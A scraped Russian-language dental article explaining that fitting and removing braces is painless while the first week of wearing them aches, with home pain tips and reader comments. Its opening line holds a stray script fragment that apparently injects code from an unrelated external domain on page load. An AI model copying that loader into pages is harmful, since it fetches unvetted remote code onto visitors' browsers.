--> Больно ли ставить, носить и снимать брекеты , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Брекеты — это больно?

1 Star2 Stars3 Stars4 Stars5 Stars (28 голосов, средняя оценка: 4,68 из 5)
Loading ... Loading ...
боль и брекеты - фото

Так все же, причиняют ли брекеты боль?

Наконец-то,  после того как вы неоднократно побывали на приеме у  ортодонта, прошли множество обследований, сделали не один рентгеновский снимок, вы принимаете решение о том, что вам или вашему ребенку необходимо исправление прикуса с помощью брекетов. Второй вопрос, на который вы непременно захотите услышать ответ, после того как выясните сколько стоят брекеты, будет вопрос: «брекеты это больно?».

 

Пациенты часто спрашивают об этом. Ведь большинство людей так или иначе не любит и даже немного боится посещать стоматолога и лечить зубы. Если быть совсем точным, то пациентов беспокоят три основных вопроса:

  1. Больно ли ставить брекеты?
  2. Больно ли носить брекеты?
  3. Больно ли снимать брекеты?

Чтобы ответить на эти вопросы нужно рассказать о тех этапах лечения брекетами, которые вам предстоят.

 

И так:

Установка брекетов ортодонтом

больно ли устанавливать брекеты - фото

Установка брекетов не причинит боли.

На этом этапе вам придется достаточно долго провести в стоматологическом кресле, пока доктор будет выполнять свою кропотливую работу. В процессе которой ортодонд специальным клеем приклеит к поверхности каждого зуба (согласно заранее разработанному плану лечения) небольшой прямоугольный кронштейн, выполненный из металла, керамики или пластика. После этого соединит зубы с помощью этих кронштейнов металлической дугой изготовленной из специального сплава. Это дуга имеет некоторое напряжение, сила которого будет толкать зубы в нужном направлении для того, чтобы исправить прикус.

Отвечая на вопрос больно ли устанавливать брекеты, можно сказать — нет это не больно.

Если только немного заноют мышцы челюсти, от долгого сидения с широко открытым ртом. :)

 

Ношение брекетов

После того как вы с  установленной во рту брекет-системой покинете кабинет доктора, несколько дней (обычно 3-5) будете испытывать некоторый дискомфорт, возможно достаточно сильный. Причина в том, что у вас во рту появилось инородное тело, которое может натирать и ранить губы и щеки, а в случае применения лингвальных брекетов и язык. А также у некоторых пациентов в эти дни может возникать тупая не очень сильная боль в самих зубах, вызванная их перемещением.

Конечно, все зависит от порога болевой чувствительности человека, у кого-то боли практически нет, а кому-то она все же доставляет некоторое беспокойство.

Поэтому на начальном этапе ношения мы можем сказать «ДА», на вопрос: «Причиняют ли брекеты боль, когда вы их носите?»

Но это не нестерпимая боль, которая бывает, когда болит зуб, пораженный глубоким кариесом. Соответственно терпеть будет не сложно.

К концу первой недели большинство неприятных ощущений пройдет и вы привыкните к брекетам.

Правда следует помнить, что пока вы носите брекеты вам необходимо будет периодически приходить на прием к ортодонту для их регулировки. Дело в том, что исправление прикуса брекетами предполагает постепенное вытягивание зубов в правильном направлении. Достигается это с помощью той самой проволоки, которая соединят между собой кронштейны. И эту проволоку нужно периодически заменять на более упругую. Так вот после её замены, из-за возросшего давления на зубы болезненные ощущения могут вновь появится, но в гораздо меньшей степени, чем в первую неделю ношения брекетов.

Как ставят брекеты — подробный рассказ о том, как устанавливают брекет-систему.
Как снимаются брекеты — рассказываем и показываем видео.

Снятие брекетов

Обычно дойдя до этого этапа пациенты уже не интересуются, больно ли снимать брекет-систему. Так как во-первых, страх посещения стоматолога за это время улетучивается, а во-вторых, пациенты находятся в радостном предвкушении того момента когда они почувствуют отсутствие брекетов у себя во рту, а самое главное, смогут полноценно широко улыбаться демонстрируя окружающим свои ровные зубы. Но все же для особо беспокойных пациентов скажем, что переживать и волноваться по поводу процедуры снятия брекет-системы и возможной боли не стоит.

Снимать брекеты совсем не больно.

P.S. Несколько советов о том, как уменьшить боль и неприятные ощущения в первую неделю ношения брекетов.

Как вы уже поняли, иногда случается, что немного болят зубы от брекетов. Обычно это происходит в первую неделю после установки. Ниже приводятся советы, помогающие легче перенести это:

  1. Если боль достаточно сильна, можете принять обезболивающие препараты, отпускаемые без рецепта. Не забывайте четко следовать инструкции по их пременению, дабы не произошло передозировки. Также обратите внимание на условия приема этих таблеток, обычно такие препараты не следует принимать на голодный желудок. Лучше делать это после еды.
  2. В случае когда брекеты раздражают слизистую рта, можно воспользоваться ортодонтический воском. Его наклеивают на ту часть брекет-системы, которая вам натирает губу или щеку. Необходимость использования воска через некоторое время исчезнет, так как слизистые оболочки привыкнут к брекетам.
  3. Также для снижения болевых ощущений можно периодически полоскать рот теплой подсоленной водой.
  4. Если брекеты уже поранили вашу слизистую, можно воспользоваться специальными средствами, которые облегчают боль, обеззараживают и ускоряют заживление язвочек. Такие средства выпускаются фармацевтическими компаниями в широком ассортименте, и свободно продаются в любой аптеке. Вы можете попросить вашего ортодонта порекомендовать вам один из этих препаратов либо, если забыли сделать это, можете просто купить любое средство предложенное провизором в аптеке.

 

Вот, в общем-то и все, о чем хотелось вам рассказать в рамках статьи о боли, причиняемой брекетами. Надеемся для вас она была полезной. И стала ещё одним маленьким шагом на пути к здоровым ровным зубам и восхитительной улыбке.

Комментарии

  1. Магомед:

    Спасибо.У меня завтра брекеты ставят вот поэтому я немного боялся огромное спасибо

  2. Сюзанна Зайка:

    Мне будут ставить я пересмотрела весь ютуб и поняла, что это не больно. Ещё спросила всех своих друзей — говорят, что это не страшно. Я, конечно, сомневаюсь но не боюсь!!!

  3. Сюзанна Зайка:

    Ну вот мне и поставили брекеты только на верхнюю челюсть, на все 12 зубов. Утром их поставили, а вечером они начали отваливаться. У моей мамы давление шандарахнуло 170 на 105, это ужасно. Потом утром на следующий день я поехала в стоматологию. Там мне сняли 4 брекета которые отклеились, ну то есть 2 отклеились, а 2 отпало. Мне их сняли и прошлифовали 4 зуба. Это было немного больно, но нечего жива. И сейчас я хожу красивая красотка. На до мной не смеются. Короче, мальчики и девочки, если вам надо их ставить не бойтесь, это не страшно и не больно. Это кайфово! Удачи всем!

  4. Софи:

    Когда ставят брекеты это очень больно! Во всяком случае для меня так было, может у меня болевой порог низкий — не знаю. И носить их тоже было больно и снимать! Так что на мой взгляд, не особо верьте в то, что пишут. Для меня было их было ужасно и носить, и снимать, и ставить!
    P.S. Хотя это может я такая трусиха.

  5. Маша:

    Сюзанна, что у вас за ортодонт, у которого в первый же день брекеты отклеились?! Так быть категорически не должно!!! Это не правильно!
    Я носила брекеты с 12-14 лет. После чего мне «прописали» капу после снятия. Капу я по глупости не носила и зубы вновь искривились. Теперь (вчера) поставила брекеты второй раз, мне сейчас 24 года. Они красивые, я бы даже сказала, сапфировые. Перед этим делали операцию — удаляли сразу три зуба мудрости, заживало не долго, но все лицо опухло и было в огромном синяке, даже шея.
    Сейчас (второй день) зубы начали болеть, ночью просыпалась. Помню из прошлого опыта, что это в пределах нормы. Кушать конечно что-то жуя я не смогу, да и в дни после операции ела лишь детское питание, ложка даже в рот не лезла, а потом швы удалили и стало все налаживаться. А теперь вот брекеты, опять без еды. :)
    Голодная диета, ха-ха-ха!

  6. Руслан:

    Сегодня поставили брекеты. Боль есть, и есть она у всех, у кого ну очень кривые зубы (как у меня) чистить и вправду занятие не из лучших. А диета не плоха. :)

  7. Адина:

    Три дня назад поставили керамические брекеты, только на верхнюю часть челюсти. В первый день ничего не болело, зато сейчас так болят зубы!… :( Есть не могу ничего… Надеюсь, это не надолго. Уверена, что результат того стоит! :)

  8. Плюшевая Ксюша:

    А я вот полтора года носила пластинку. Это было ужасно. Мало того, что я с ней шепелявила, так ещё её приходилось снимать в школе, когда мы завтракали. И все сразу начинали: «Зачем у тебя пластинка?» «Зачем ты ее снимаешь?»
    «А ее не больно носить?»
    Меня это доставало. Я делала всё, чтобы её не носить. И в какой-то день она сломалась. Я была жутко рада. С тех пор я ничего не ношу. Недавно мы переехали и вчера пошли к другому зубному. Скорей всего, я буду носить брекеты, когда выпадут все молочные зубы (их осталось всего ничего).
    Почитала ваши комментарии, и теперь боюсь, что у меня тоже будет также, что будет адски болеть.

  9. Галина:

    Четыре дня назад поставила брекеты на верхнюю челюсть, только на второй день стали побаливать зубы. Ставить их совсем не больно, да и в кресле у врача провела минут 40 только. Искривлены только три зуба с левой стороны, поэтому легко жую на правой-ничего не болит! На третий день боль прошла, брекетами слизистую не натерла. Советую всем ставить по показаниям, нет ничего страшного в ношении брекет-системы.

Комментировать